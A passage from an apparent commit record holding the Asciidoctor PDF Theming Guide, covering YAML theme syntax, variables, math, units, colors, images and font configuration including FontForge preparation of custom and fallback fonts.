the button UI element)\n* \\u202f - narrow no-break space (used in the keybinding UI element)\n* \\u2011 - non-breaking hyphen\n* \\u2022 - disc (used for first-level unordered list level)\n* \\u25e6 - circle (used for second-level unordered list level)\n* \\u25aa - square (used for third-level unordered list level)\n* \\u2611 - ballot box checked (used for checked list item)\n* \\u2610 - ballot box unchecked (used for unchecked list item)\n* \\u2014 - em-dash (used in quote attribute)\n* \\u203a - single right-pointing quotation mark (used in the menu UI element)\n* \\u25ba - right pointer (used for media play icon when icon fonts are disabled)\n\nIf you're preparing a font for use in verbatim blocks (e.g., a listing block), you'll also need this range of characters:\n\n* \\u2460 to \\u2468 - circled numbers\n\nOne way to get these glyphs is to steal them from another font (or from another character in the same font).\nTo do so, open the other font in FontForge, select the character, press kbd:[Ctrl,c], switch back to your font, select the character again, and press kbd:[Ctrl,v].\nYou may need to scale the glyph so it fits properly in the art box.\n\nIMPORTANT: If you're copying a non-visible character, be sure to set the width to 0 using menu:Metrics[Set Width...], enter 0 into *Set Width To*, then click btn:[OK].\n\n
When you're done, save the font with the old-style kern table enabled.\nTo do so, select menu:File[Generate Fonts...], click btn:[Options], and make sure only the following options are selected (equivalent to the flags 0x90 + 0x08):\n\n* [x] OpenType\n ** [x] Old style 'kern'\n\nThen click btn:[Generate] to generate and save the font.\n\nYour font file is now ready to be used with Asciidoctor PDF.\n\n=== Scripting the Font Modifications\n\nPerforming all this font modification manually can be tedious (not to mention hard to reproduce).\nFortunately, FontForge provides a {url-fontforge-scripting}[scripting interface], which you can use to automate the process.\n\nIn fact, that's what we use to prepare the fonts that are bundled with Asciidoctor PDF.\nYou can find that FontForge script, the Bash script that calls it, and the Docker image in which it is run in the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/tree\/master\/scripts[scripts directory] of this project.\nYou can use that script as a starting point or reference for your own font preparation \/ modification script.\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\n:experimental:\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # #]\n:url-fontforge: https:\/\/fontforge.github.io\/en-US\/\n:url-fontforge-scripting: https:\/\/fontforge.github.io\/en-US\/documentation\/scripting\/\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nTIP: The quickest way to get started creating your own theme is to <<Extends,extend the default theme>>.\nThis not only gives you all the styles you need to build on, but also a collection of <<Bundled Fonts,bundled fonts>>.\nIf you override the font catalog in your theme file, you must declare all the fonts you use (and provide the font files themselves).\nInstead, if you want to reuse the bundled fonts, simply reference the <<Bundled Fonts,bundled fonts>> in the <<Custom Fonts,font catalog>>.\n\nWARNING: If you don't declare your own fonts (or extend the default theme), only the built-in (AFM) fonts provided by the PDF reader will be available.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe Asciidoctor PDF theme language is described using the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many _concepts_ from CSS and SASS.\nTherefore, if you have a background in web design, the terminology should be immediately familiar to you.\n
*Note, however, that the theming system isn't actually CSS.*\n\nLike CSS, themes have both selectors and properties.\nSelectors are the components you want to style.\nThe properties are the style elements of those components that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font-size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all property names (so you may use `font_family` or `font-family`).\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all variable names (so you may use `$base_font_family` or `$base-font-family`).\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font-style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `align` property in the theme language is roughly equivalent to the `text-align` property in CSS.\n* The `font-color` property in the theme language is equivalent to the `color` property in CSS.\n====\n\nA theme is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that is well suited to describing the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n line-height-length: 17\n line-height: $base-line-height-length \/ $base-font-size\nvertical-spacing: $base-line-height-length\nheading:\n font-color: #262626\n font-size: 17\n font-style: bold\n line-height: 1.2\n margin-bottom: $vertical-spacing\nlink:\n font-color: #002FA7\noutline-list:\n indent: $base-font-size * 1.5\nfooter:\n height: $base-line-height-length * 2.5\n line-height: 1\n recto:\n right:\n content: '{page-number}'\n verso:\n left:\n content: $footer-recto-right-content\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nInstead of writing a theme from scratch, you can extend the default theme using the `extends` key as follows:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nYou can also point the extends key at another custom theme to extend from it.\nCurrently, the base theme is always loaded first.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\n
Instead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`) or hyphen (`-`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font-color`) into a single, qualified key (e.g., `link_font_color` or `link-font-color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase-font-color: #333333\nbase-font-family: Times-Roman\nbase-font-size: 12\n----\n\nOr, to avoid having to type the prefix `base-` multiple times, the keys may be written as a hierarchy:\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two spaces from the indentation of the parent level.\nAlso note the presence of the colon (`:`) after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n ** Font family name (e.g., Roboto)\n ** Font style (normal, bold, italic, bold_italic)\n ** Alignment (left, center, right, justify)\n ** Color as hex string (e.g., 'ff0000', #ff0000, or '#ff0000')\n ** Image path\n ** Enumerated type (where specified)\n ** Text content (where specified)\n* Null (clears any previously assigned value)\n ** _empty_ (i.e., no value specified)\n ** null\n ** ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n ** Color as RGB array (e.g., [51, 51, 51])\n ** Color CMYK array (e.g., [50, 100, 0, 0])\n ** Margin (e.g., [1in, 1in, 1in, 1in])\n ** Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color or $base-font-color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principal feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font-family\n* font-color\n* font-size\n* font-style\n* text-transform\n* line-height (currently some exceptions)\n* margin-bottom (if not specified, defaults to $vertical-spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading-h2-font-size`), then to the heading category (e.g., `heading-font-size`), then directly to the base value (e.g., `base-font-size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n
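For instance, here's a minimal sketch of the fallback chain just described: level-2 headings use the `h2` override, the other heading levels fall back to the value from the `heading` category, and any property not set in either place is inherited from the base value.\n\n[source,yaml]\n----\nbase:\n font-size: 10.5\nheading:\n font-size: 16\n h2-font-size: 20\n----\n\n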
=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base-font-size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In other words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n----\n\nthe variable `$base-font-color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading-font-color` to the `sidebar-title-font-color` key.\n\n[source,yaml]\n----\nheading:\n font-color: #191919\nsidebar:\n title:\n font-color: $heading-font-color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n font-size-small: $base-font-size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary-color: #E0162B {conum-guard-yaml} <1>\n secondary-color: '#FFFFFF' {conum-guard-yaml} <2>\n alert-color: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add `+#+` in front of the hex color value to coerce it to a string.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value (for example, 000000 would become 0, so use '000000' or #000000 instead).\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: $brand-primary-color\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations to support calculated values.\nLike programming languages, multiply and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line-height: 4 \/ 3\n----\n\n
Variables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number down to the previous integer.\nceil(...):: Rounds the number up to the next integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font-size: 12.5\n font-size-large: ceil($base-font-size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the unit defaults to pt.\n\nHowever, we humans like to think in real world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inches\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Points\n|pt (default)\n|===\n\n. A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n
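Assuming each entry in the array carries its own unit notation and is converted to points independently, you can even mix units within a single measurement array, as in this contrived sketch:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 20mm, 1.5cm, 36]\n----\n\n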
=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, wherever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nIn many places where font properties can be specified, a case transformation can be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in the following formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes, or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes, or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\nThat same preprocessor will also coerce a primitive value to a string if `color` is the name of the last segment in the key (e.g., `font-color`).\nThis avoids the problem of 000 becoming 0 (and similar implicit conversions) when the theme file is parsed.\n\nYou also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how an RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [255, 0, 0]\n----\n\n
==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\nbase:\n background-color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages in the theme file are currently resolved relative to the value of the `pdf-themesdir` attribute.\n(If `pdf-theme` is a path that ends in `.yml`, and `pdf-themesdir` is not set, then the images are resolved relative to the directory of the path specified by `pdf-theme`).\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) and BMP format (.bmp) are not supported unless you're using prawn-gmagick.\nSee https:\/\/github.com\/asciidoctor\/asciidoctor-pdf#supporting-additional-image-file-formats[support for additional image file formats] for details.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle-page:\n background-image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle-page:\n background-image: image:title-cover.png[]\n----\n\nIn either case, the image is resolved relative to the value of the `pdf-themesdir` attribute, as previously described.\n\nLike in the AsciiDoc syntax, wrapping the value in the image macro allows you to specify other settings, such as `pdfwidth`, `fit`, and\/or `align`.\nFor example:\n\n[source,yaml]\n----\ntitle-page:\n logo-image: image:logo.png[width=250,align=center]\n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.\nYou can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.\nIf you need to add an underline or strikethrough decoration to the text, you can assign `underline` or `line-through` to the `class` attribute on any aforementioned element.\n\nHere's an example of using formatting in the content of the menu caret:\n\n[source,yaml]\n----\nmenu-caret-content: \" <font size=\\\"1.15em\\\"><color rgb=\\\"#b12146\\\">\\u203a<\/color><\/font> \"\n----\n\n
use a Unicode escape code like `\\u203a`.\n\nAdditionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.\n\n== Fonts\n\nYou can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\nIMPORTANT: Asciidoctor itself has no trouble working with Unicode.\nIn fact, it prefers Unicode and considers the entire range.\nHowever, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.\nThat means you need to provide a font (at least a fallback font) that contains glyphs for all the characters you want to use.\nIf you don't, you may notice that characters are missing.\nThere's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.\n\n=== Built-In (AFM) Fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[width=33.33%]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font-family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font-family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc.).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\n\nWARNING: Built-in (AFM) fonts do not use the <<fallback-fonts,fallback fonts>>.\nIn order for the fallback font to kick in, you must be using a TrueType font.\n\n.WINANSI Encoding Behavior\n****\nWhen using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logical \"`not`\" glyph (`¬`) and you'll see the following warning in your console:\n\n The following text could not be fully converted to the Windows-1252 character set:\n | <string with unknown glyph>\n\nThis behavior differs from the default behavior in Prawn, which is to simply crash.\n\nYou'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.\nTo prevent this warning, you need to specify a TrueType font.\n\nWhen using a TrueType font, you will get no warning for a missing glyph.\nThat's a consequence of how Prawn works and is outside of Asciidoctor PDF's control.\n\nFor more information about how Prawn handles character encodings for built-in fonts, see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].\n****\n\n
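If you decide to stick with the built-in fonts, here's a minimal sketch that maps the three families onto common theme categories (the `heading` and `code` keys are covered under <<Keys>>; the pairing of families to categories is just one reasonable choice, not a recommendation):\n\n[source,yaml]\n----\nbase:\n  # body text uses the built-in serif face\n  font-family: Times-Roman\nheading:\n  # headings use the built-in sans-serif face\n  font-family: Helvetica\ncode:\n  # verbatim blocks use the built-in monospace face\n  font-family: Courier\n----\n\n=== Bundled Fonts\n\nAsciidoctor PDF bundles several fonts that are used by the default theme.\nYou can also 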
use these fonts in your custom theme by simply declaring them.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).\n\nThe family names of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[Noto Serif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[M+ 1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[M+ 1p Fallback]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUsed as the fallback font in the `default-with-fallback-font` theme.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).\nThis limitation may be lifted in the future.\n\n=== Custom Fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, find the TTF file collection for the font you want to use.\nA collection typically consists of all four font styles:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so the italic styles are required._\n\nIn order for a third-party font to work properly with Prawn (and hence Asciidoctor PDF), several modifications are required.\nSee <<Prepare a Custom Font>> to learn how to prepare your font for use with Asciidoctor PDF.\n\nOnce you've obtained the TTF files, put them in the directory inside your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nRename the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font-catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key that you assign to the font in the font catalog anywhere the `font-family` property is accepted in the theme file.\nFor example, to use the Roboto font for all headings, use:\n\n[source,yaml]\n----\nheading:\n font-family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-theme=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\n
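Putting the pieces together, here's a sketch of what the `basic-theme.yml` file referenced by that command might contain: the catalog declaration plus one use of the catalog key (adapt the names to your own font files):\n\n[source,yaml]\n----\nfont:\n  catalog:\n    Roboto:\n      normal: roboto-normal.ttf\n      italic: roboto-italic.ttf\n      bold: roboto-bold.ttf\n      bold_italic: roboto-bold_italic.ttf\nbase:\n  # the catalog key is now available as a font family\n  font-family: Roboto\n----\n\nTIP: When Asciidoctor PDF creates the PDF, it only embeds the glyphs from 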
the font that are needed to render the characters present in the document.\nEffectively, it subsets the font.\nWhile that saves space taken up by the generated PDF, you may still be storing the full font in your source repository.\nTo minimize the size of the source font, you can use {url-fontforge}[FontForge] to subset the font ahead of time.\nSubsetting a font means removing glyphs you don't plan to use.\nDoing so is not a requirement, simply a personal preference.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n Roboto Light:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\nText in SVGs will use the font catalog from your theme.\nWe recommend that you match the font key in your theme file to the name of the font seen by the operating system.\nThis will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF, thus making them portable.\n\n=== Fallback Fonts\n\nIf a TrueType font is missing a character needed to render the document, such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.\nYou only need to specify a single fallback font, typically one that provides a full set of symbols.\n\nIMPORTANT: The fallback font only gets used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).\nAny glyph missing from an AFM font is simply replaced with the \"`not`\" glyph (`¬`).\n\nCAUTION: The `default` theme does not use a fallback font.\nHowever, the built-in `default-with-fallback-font` theme does.\nUsing the fallback font slows down PDF generation slightly because it has to analyze every single character.\nIts use is not recommended for large documents.\nInstead, it's best to select primary fonts that have all the characters you need.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/github.com\/android\/platform_frameworks_base\/blob\/master\/data\/fonts\/DroidSansFallback.ttf[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, add the key name to the `fallbacks` key under the `font-catalog` key.\nThe `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.\nHowever, we recommend using a single fallback font, if possible, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks:\n - DroidSansFallback\n----\n\nTIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.\n\n
